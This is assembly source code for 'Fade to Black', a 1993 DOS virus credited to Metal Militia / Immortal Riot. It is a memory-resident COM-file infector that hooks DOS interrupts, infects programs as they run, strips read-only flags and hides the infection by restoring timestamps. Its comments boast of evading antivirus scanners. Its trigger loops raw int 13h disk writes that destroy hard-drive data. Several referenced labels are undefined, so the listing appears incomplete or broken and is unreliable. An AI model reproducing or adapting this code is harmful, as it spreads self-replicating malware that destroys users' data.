; VirusName: Fade to Black
; Country  : Sweden
; Author   : Metal Militia / Immortal Riot
; Date     : 07-29-1993
; This is a mutation of	Creeping Tormentor, whick was discovered
; in Feb 1992. The origin is "unknown" (attention Patricica), it's
; written  in Sweden by Tormentor / Demoralized Youth
; Many thanx goes to Tormentor for the original code.
; This is a Parasite, Resident, Appending COM-files infector.
; Searches for the string sUMsDos (?) in memory.
; search for Jerusalen, and if it's locate it, crash the HD.
; This will just fine, and
; McAfee Scan v105 can't find it, and
; S&S Toolkit 6.5 don't find it either.
; I haven't tried with scanners like Fprot/Tbscan,
; but they will probably report some virus structure.
; Best Regards : [Metal Militia]
;	        [The Unforgiven]

code            segment byte public
                assume  cs:code, ds:code, es:code, ss:code
		org	100h

                mov     ax,0700h                ; Remove virus from code!
                int     21h ;^-- Scan string (before it was ax,043FFh)

; Let's allocate some mem!

		mov	ax,ds
		sub	ax,11h
		mov	ds,ax
		cmp	byte ptr ds:[0100h],5Ah
		jnz	skip
		mov	ax,ds:[0103h]
		sub	ax,40h
		jb	skip
		mov	ds:[0103h],ax
		sub	word ptr ds:[0112h],50h
		mov	es,ds:[0112h]
		push	cs
		pop	ds
		mov	cx,code_end-codebeg
		mov	di,100h
		push	di
		mov	si,di
		rep	movsb

		push 	es
		pop	ds

		mov	ax,351Ch
		int	21h
		mov	word ptr ds:[int1Cret],bx
		mov	word ptr ds:[int1Cret+2],es
		mov	al,21h
		int	21h
		mov	word ptr ds:[real21+1],bx
		mov	word ptr ds:[real21+3],es
		mov	ah,25h
		mov	dx,offset int21beg
		int	21h
		mov	al,1Ch
		mov	dx,offset int1Cnew
		int	21h
		push	cs
		push	cs
		pop	es
		pop	ds

skip:		int	20h		

int21beg:	push	ax
		sub	ax,4B00h
		jz	infect
		pop	ax
                cmp     ax,0700h                ; Check if ....
		jne	real21
		mov	ax,word ptr ds:[retdata]
		mov	si,ax
		mov	di,100h
		mov	cx,code_end-codebeg
		rep	movsb

		mov	ax,100h
		pop	cx
		pop	cx
		push	es
		push	ax

real21:		db	0EAh, 00h, 00h, 00h, 00h	; Jump to org21vec.

retdata:	db	00h, 00h

f_time:		dw	0000h

f_date:		dw	0000h	

infect:		pop	ax

		push	ax
		push	bx
		push	cx
		push	di
		push	ds
		push	dx
		push	si		

		mov	ah,43h			; Get file attr.
		int	21h
		mov	ax,4301h
		and	cx,0FEh			; Strip the Read-only-flag
		int	21h

		mov	ax,3D02h		; Open victim.
		int	21h

		xchg	ax,bx

		call	sub_2  

sub_2:		mov	di,sp			; God what I hate that Eskimo!
		mov 	si,ss:[di]
		inc	sp
		inc	sp

		push	cs
		pop	ds

		mov	ax,5700h		; Get file's time and date
		int	21h
		mov	[si-(sub_2-f_time)],cx	
		mov	[si-(sub_2-f_date)],dx	; And save them...

		mov	ah,3Fh			; Read X byte from begin.
		mov	cx,code_end-codebeg
		add	si,code_end-sub_2	; SI points to EOF	
		mov	dx,si
		int	21h			

                cmp     word ptr [si],'MZ'      ; Mark Zimbowski? (EXE?)
		je	close
                cmp     word ptr [si],'ZM'      ; Zimbowski Mark? (EXE?)
		je 	close	
mark:           cmp     word ptr [si+(mark-codebeg+4)],'��'     ; infected?
                je      close

		call	put_eof			; move file ptr to EOF

		cmp	ax,(0FFFFh-(code_end-codebeg)-100h)
		ja	close
		cmp	ax,code_end-codebeg+100h
		jb	close

		add	ax,100h
		mov	word ptr ds:[si-(code_end-retdata)],ax	

		mov	ah,40h			; Flytta (move) beg to end.
		mov	cx,code_end-codebeg
		mov	dx,si
		int	21h
		mov	ax,4200h		; fptr to filbeg.
		xor 	cx,cx
		xor 	dx,dx
		int	21h
		mov	ah,40h			; Write virus to beg.
		mov	cx,code_end-codebeg
		mov	dx,si
		sub	dx,cx
		int	21h

close:		mov	ax,5701h
		mov	cx,[si-(code_end-f_time)]
		mov	dx,[si-(code_end-f_date)]
		int	21h

		mov	ah,3Eh			
		int	21h			; close file, bx=file handle

		pop	si
		pop	dx
		pop	ds
		pop	di
		pop	cx
		pop	bx
		pop	ax

		jmp	real21

put_eof:	mov 	ax,4202h
		xor	dx,dx
		xor	cx,cx
		int 	21h


		push 	ax
		inc 	byte ptr cs:[counter]
		mov 	al,30h
		cmp 	byte ptr cs:[counter],al
		jz 	scan
		pop 	ax

quit:           jmp     dword ptr cs:[int1Cret]

		push 	bx
		push 	cx
		push 	di
		push	ds
		push	dx
		push	es
		push	si

		push 	cs
		pop 	ds

		xor 	bx,bx
		mov 	byte ptr cs:[counter],bh
		mov 	cx,0FA0h

		mov 	ax,0b800h
		mov 	es,ax
		xor 	di,di

again:		mov 	al,byte ptr cs:[text+bx]
		sub	al,80h
		repnz 	scasb	
		jnz 	stick

maybe:		inc 	di
		inc 	bx
		cmp 	bx,10d
		jz	beep

		mov	al,byte ptr cs:[text+bx]
		sub	al,80h
		jz	maybe
		xor	bx,bx
		jmp	again

		xor	cx,cx
		mov	bx,word ptr cs:[int1Cret]
		mov	es,word ptr cs:[int1Cret+2]
		mov	ax,251Ch
		int	21h

overagain:	mov	dx,0180h
		xor	bx,bx

reset:		mov	ah,00h
		inc	bx
		cmp	bl,5h
		jz	raise		
		inc	cx
		int	13h

hoho:		mov	ax,0380h
		inc	cx
		int	13h
		jc	reset
		jmp 	hoho		

raise:		xor	cx,cx
		xor	bx,bx
		inc	dx
		cmp	dl,85h
		jnz	hoho
		jmp	overagain	
		pop	si		
		pop	es
		pop	dx
		pop 	ds
		pop 	di
		pop 	cx
		pop 	bx 		
		pop 	ax

                jmp     quit

counter:	db 	00h

text:           db      's'+80h, 'U'+80h, 'M'+80h, 's'+80h, 'D'+80h, 'o'+80h
                db      's'+80h

                        ; This is what it scans the screen for --^ sUMsDos
			; just a little bit cryptic eh ?

int1Cret:	db	0EAh, 00h, 00h, 00h, 00h

code_end:					; THE END.

; This isn't really a bullshit note, this is a Metallica Note ;)
; which means quality! Metal Up Your Ass!

bullshit_note   db "Metal Militia / Immortal Riot     "
        DB      "Fade To Black   " 
	DB	"Things not what they used to be "
	DB	"Missing one inside of me "
	DB	"Deathly lost, this can't be real "
	DB	"Cannot stand this hell I feel... "

code            ends
end		codebeg

; Think that would be it..